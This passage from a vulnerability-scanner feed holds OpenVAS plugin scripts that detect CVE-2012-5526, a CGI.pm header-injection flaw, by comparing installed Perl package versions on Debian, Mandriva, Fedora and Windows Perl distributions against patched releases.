value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"libcgi-pm-perl\", ver:\"3.49-1squeeze2\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-11-19T13:05:13", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2018-11-16T00:00:00", "published": "2012-12-18T00:00:00", "id": "OPENVAS:1361412562310831757", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310831757", "title": "Mandriva Update for perl-CGI MDVSA-2012:180 (perl-CGI)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for perl-CGI MDVSA-2012:180 (perl-CGI)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://www.mandriva.com/en/support/security/advisories/?name=MDVSA-2012:180\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.831757\");\n script_version(\"$Revision: 12381 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-16 12:16:30 +0100 (Fri, 16 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-12-18 10:06:00 +0530 (Tue, 18 Dec 2012)\");\n script_cve_id(\"CVE-2012-5526\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_xref(name:\"MDVSA\", value:\"2012:180\");\n script_name(\"Mandriva Update for perl-CGI MDVSA-2012:180 (perl-CGI)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'perl-CGI'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\", re:\"ssh/login/release=MNDK_(2011\\.0|mes5\\.2)\");\n script_tag(name:\"affected\", value:\"perl-CGI on Mandriva Linux 2011.0,\n Mandriva Enterprise Server 5.2\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"insight\", value:\"A vulnerability was discovered and corrected in perl-CGI:\n\n CGI.pm module before 3.63 for Perl does not properly escape newlines in\n (1) Set-Cookie or (2) P3P headers, which might allow remote attackers\n to inject arbitrary headers into responses from applications that\n use CGI.pm (CVE-2012-5526).\n\n The updated packages have been patched to correct this issue.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"MNDK_2011.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"perl-CGI\", rpm:\"perl-CGI~3.530.0~1.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-CGI-Fast\", rpm:\"perl-CGI-Fast~3.530.0~1.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"MNDK_mes5.2\")\n{\n\n if ((res = isrpmvuln(pkg:\"perl-CGI\", rpm:\"perl-CGI~3.51~0.2mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-CGI-Fast\", rpm:\"perl-CGI-Fast~3.51~0.2mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-01-08T12:58:38", "bulletinFamily": "scanner", "description": "Check for the Version of perl-CGI", "modified": "2018-01-08T00:00:00", "published": "2012-12-18T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=864949", "id": "OPENVAS:864949", "title": "Fedora Update for perl-CGI FEDORA-2012-18330", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for perl-CGI FEDORA-2012-18330\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"CGI.pm is a stable, complete and mature solution for processing and preparing\n HTTP requests and responses. Major features including processing form\n submissions, file uploads, reading and writing cookies, query string generation\n and manipulation, and processing and preparing HTTP headers. Some HTML\n generation utilities are included as well.\n\n CGI.pm performs very well in in a vanilla CGI.pm environment and also comes\n with built-in support for mod_perl and mod_perl2 as well as FastCGI.\";\n\ntag_affected = \"perl-CGI on Fedora 16\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2012-December/094762.html\");\n script_id(864949);\n script_version(\"$Revision: 8313 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-08 08:02:11 +0100 (Mon, 08 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-12-18 09:59:58 +0530 (Tue, 18 Dec 2012)\");\n script_cve_id(\"CVE-2012-5526\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_xref(name: \"FEDORA\", value: \"2012-18330\");\n script_name(\"Fedora Update for perl-CGI FEDORA-2012-18330\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of perl-CGI\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC16\")\n{\n\n if ((res = isrpmvuln(pkg:\"perl-CGI\", rpm:\"perl-CGI~3.52~203.fc16\", rls:\"FC16\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2019-03-18T14:40:53", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2012-12-18T00:00:00", "id": "OPENVAS:1361412562310864949", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310864949", "title": "Fedora Update for perl-CGI FEDORA-2012-18330", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for perl-CGI FEDORA-2012-18330\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2012-December/094762.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.864949\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-12-18 09:59:58 +0530 (Tue, 18 Dec 2012)\");\n script_cve_id(\"CVE-2012-5526\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_xref(name:\"FEDORA\", value:\"2012-18330\");\n script_name(\"Fedora Update for perl-CGI FEDORA-2012-18330\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'perl-CGI'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC16\");\n script_tag(name:\"affected\", value:\"perl-CGI on Fedora 16\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC16\")\n{\n\n if ((res = isrpmvuln(pkg:\"perl-CGI\", rpm:\"perl-CGI~3.52~203.fc16\", rls:\"FC16\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2019-03-18T14:41:39", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2012-12-14T00:00:00", "id": "OPENVAS:1361412562310864933", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310864933", "title": "Fedora Update for perl-CGI FEDORA-2012-19282", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for perl-CGI FEDORA-2012-19282\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2012-December/094613.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.864933\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-12-14 09:49:57 +0530 (Fri, 14 Dec 2012)\");\n script_cve_id(\"CVE-2012-5526\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_xref(name:\"FEDORA\", value:\"2012-19282\");\n script_name(\"Fedora Update for perl-CGI FEDORA-2012-19282\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'perl-CGI'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC17\");\n script_tag(name:\"affected\", value:\"perl-CGI on Fedora 17\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC17\")\n{\n\n if ((res = isrpmvuln(pkg:\"perl-CGI\", rpm:\"perl-CGI~3.52~218.fc17\", rls:\"FC17\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-01-06T13:06:43", "bulletinFamily": "scanner", "description": "Check for the Version of perl", "modified": "2018-01-04T00:00:00", "published": "2012-12-14T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=864929", "id": "OPENVAS:864929", "title": "Fedora Update for perl FEDORA-2012-19282", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for perl FEDORA-2012-19282\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Perl is a high-level programming language with roots in C, sed, awk and shell\n scripting. Perl is good at handling processes and files, and is especially\n good at handling text. Perl's hallmarks are practicality and efficiency.\n While it is used to do a lot of different things, Perl's most common\n applications are system administration utilities and web programming. A large\n proportion of the CGI scripts on the web are written in Perl. You need the\n perl package installed on your system so that your system can handle Perl\n scripts.\n\n Install this package if you want to program in Perl or enable your system to\n handle Perl scripts.\";\n\ntag_affected = \"perl on Fedora 17\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2012-December/094612.html\");\n script_id(864929);\n script_version(\"$Revision: 8285 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-04 07:29:16 +0100 (Thu, 04 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-12-14 09:49:49 +0530 (Fri, 14 Dec 2012)\");\n script_cve_id(\"CVE-2012-5526\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_xref(name: \"FEDORA\", value: \"2012-19282\");\n script_name(\"Fedora Update for perl FEDORA-2012-19282\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of perl\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC17\")\n{\n\n if ((res = isrpmvuln(pkg:\"perl\", rpm:\"perl~5.14.3~218.fc17\", rls:\"FC17\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-07-02T21:11:12", "bulletinFamily": "scanner", "description": "The host is installed with Strawberry Perl and is prone to HTTP\n header injection vulnerability.", "modified": "2017-05-05T00:00:00", "published": "2013-01-23T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=803160", "id": "OPENVAS:803160", "title": "Strawberry Perl CGI.pm 'Set-Cookie' and 'P3P' HTTP Header Injection Vulnerability (Windows)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_perl_cgipm_module_header_inje_vuln_win.nasl 6074 2017-05-05 09:03:14Z teissa $\n#\n# Strawberry Perl CGI.pm 'Set-Cookie' and 'P3P' HTTP Header Injection Vulnerability (Windows)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation will allow attackers to inject new header items\n or modify header items.\n Impact Level: Application\";\n\ntag_affected = \"Strawberry Perl CGI.pm module before 3.63 on Windows\";\ntag_insight = \"The 'CGI.pm' module does not properly filter carriage returns from user\n supplied input to be used in Set-Cookie and P3P headers.\";\ntag_solution = \"Upgrade to Strawberry Perl CGI.pm module version 3.63 or later,\n For updates refer to http://strawberryperl.com\";\ntag_summary = \"The host is installed with Strawberry Perl and is prone to HTTP\n header injection vulnerability.\";\n\nif(description)\n{\n script_id(803160);\n script_version(\"$Revision: 6074 $\");\n script_cve_id(\"CVE-2012-5526\");\n script_bugtraq_id(56562);\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-05-05 11:03:14 +0200 (Fri, 05 May 2017) $\");\n script_tag(name:\"creation_date\", value:\"2013-01-23 18:18:09 +0530 (Wed, 23 Jan 2013)\");\n script_name(\"Strawberry Perl CGI.pm 'Set-Cookie' and 'P3P' HTTP Header Injection Vulnerability (Windows)\");\n script_xref(name : \"URL\" , value : \"http://xforce.iss.net/xforce/xfdb/80098\");\n script_xref(name : \"URL\" , value : \"http://www.securitytracker.com/id?1027780\");\n script_xref(name : \"URL\" , value : \"http://cpansearch.perl.org/src/MARKSTOS/CGI.pm-3.63/Changes\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_perl_detect_win.nasl\");\n script_mandatory_keys(\"Strawberry/Perl/Ver\", \"Strawberry/Perl/Loc\");\n script_require_ports(139, 445);\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# Code starts here\n#\n\ninclude(\"smb_nt.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\n## Variable Initialization\nspLoc = \"\";\ninsPath = \"\";\ntxtRead = \"\";\nperVer = \"\";\n\n## Get Install Location\nspLoc = get_kb_item(\"Strawberry/Perl/Loc\");\nif(spLoc)\n{\n ## append the CGI module file\n insPath = spLoc + \"\\perl\\lib\\CGI.PM\";\n share = ereg_replace(pattern:\"([A-Z]):.*\", replace:\"\\1$\", string:insPath);\n file = ereg_replace(pattern:\"[A-Z]:(.*)\", replace:\"\\1\", string:insPath);\n\n ## Read the file CGI.PM\n txtRead = read_file(share:share, file:file, offset:0, count:10000);\n if(\"CGI::revision\" >< txtRead)\n {\n ## Grep for the CGI.PM module version\n perVer = eregmatch(pattern:\"CGI::VERSION='([0-9.]+)\", string:txtRead);\n if(perVer[1])\n {\n if(version_is_less(version:perVer[1], test_version:\"3.63\"))\n {\n security_message(0);\n exit(0);\n }\n }\n }\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2019-01-09T12:21:44", "bulletinFamily": "scanner", "description": "The host is installed with Active Perl and is prone to HTTP header\n injection vulnerability.", "modified": "2019-01-08T00:00:00", "published": "2013-01-23T00:00:00", "id": "OPENVAS:1361412562310803344", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310803344", "title": "Active Perl CGI.pm 'Set-Cookie' and 'P3P' HTTP Header Injection Vulnerability (Windows)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_activeperl_cgipm_module_header_inje_vuln_win.nasl 12978 2019-01-08 14:15:07Z cfischer $\n#\n# Active Perl CGI.pm 'Set-Cookie' and 'P3P' HTTP Header Injection Vulnerability (Windows)\n#\n# Authors:\n# Arun Kallavi <karun@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.803344\");\n script_version(\"$Revision: 12978 $\");\n script_cve_id(\"CVE-2012-5526\");\n script_bugtraq_id(56562);\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-01-08 15:15:07 +0100 (Tue, 08 Jan 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-01-23 18:18:09 +0530 (Wed, 23 Jan 2013)\");\n script_name(\"Active Perl CGI.pm 'Set-Cookie' and 'P3P' HTTP Header Injection Vulnerability (Windows)\");\n script_xref(name:\"URL\", value:\"http://xforce.iss.net/xforce/xfdb/80098\");\n script_xref(name:\"URL\", value:\"http://www.securitytracker.com/id?1027780\");\n script_xref(name:\"URL\", value:\"http://cpansearch.perl.org/src/MARKSTOS/CGI.pm-3.63/Changes\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_perl_detect_win.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"ActivePerl/Ver\", \"ActivePerl/Loc\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers to inject new header items\n or modify header items.\");\n\n script_tag(name:\"affected\", value:\"Active Perl CGI.pm module before 3.63 on Windows\");\n\n script_tag(name:\"insight\", value:\"The 'CGI.pm' module does not properly filter carriage returns from user\n supplied input to be used in Set-Cookie and P3P headers.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Active Perl CGI.pm module version 3.63 or later.\");\n\n script_tag(name:\"summary\", value:\"The host is installed with Active Perl and is prone to HTTP header\n injection vulnerability.\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://www.perl.org/get.html\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\napLoc = get_kb_item(\"ActivePerl/Loc\");\nif(apLoc)\n{\n insPath = apLoc + \"\\lib\\CGI.PM\";\n txtRead = smb_read_file(fullpath:insPath, offset:0, count:10000);\n if(\"CGI::revision\" >< txtRead)\n {\n perVer = eregmatch(pattern:\"CGI::VERSION='([0-9.]+)\", string:txtRead);\n if(perVer[1])\n {\n if(version_is_less(version:perVer[1], test_version:\"3.63\"))\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n }\n }\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-07-24T12:51:27", "bulletinFamily": "scanner", "description": "It was discovered that the CGI module for Perl does not filter LF\ncharacters in the Set-Cookie and P3P headers, potentially allowing\nattackers to inject HTTP headers.", "modified": "2017-07-07T00:00:00", "published": "2013-09-18T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=892587", "id": "OPENVAS:892587", "title": "Debian Security Advisory DSA 2587-1 (libcgi-pm-perl - HTTP header injection)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2587_1.nasl 6611 2017-07-07 12:07:20Z cfischer $\n# Auto-generated from advisory DSA 2587-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\n\ntag_affected = \"libcgi-pm-perl on Debian Linux\";\ntag_insight = \"CGI.pm is a Perl module that provides classes useful for creating Web forms\nand for parsing their contents. It defines CGI objects, entities that contain\nthe values of the current query string and other state variables.\";\ntag_solution = \"For the stable distribution (squeeze), this problem has been fixed in\nversion 3.49-1squeeze2.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 3.61-2.\n\nWe recommend that you upgrade your libcgi-pm-perl packages.\";\ntag_summary = \"It was discovered that the CGI module for Perl does not filter LF\ncharacters in the Set-Cookie and P3P headers, potentially allowing\nattackers to inject HTTP headers.\";\ntag_vuldetect = \"This check tests the installed software version using the apt package manager.\";\n\nif(description)\n{\n script_id(892587);\n script_version(\"$Revision: 6611 $\");\n script_cve_id(\"CVE-2012-5526\");\n script_name(\"Debian Security Advisory DSA 2587-1 (libcgi-pm-perl - HTTP header injection)\");\n script_tag(name: \"last_modification\", value:\"$Date: 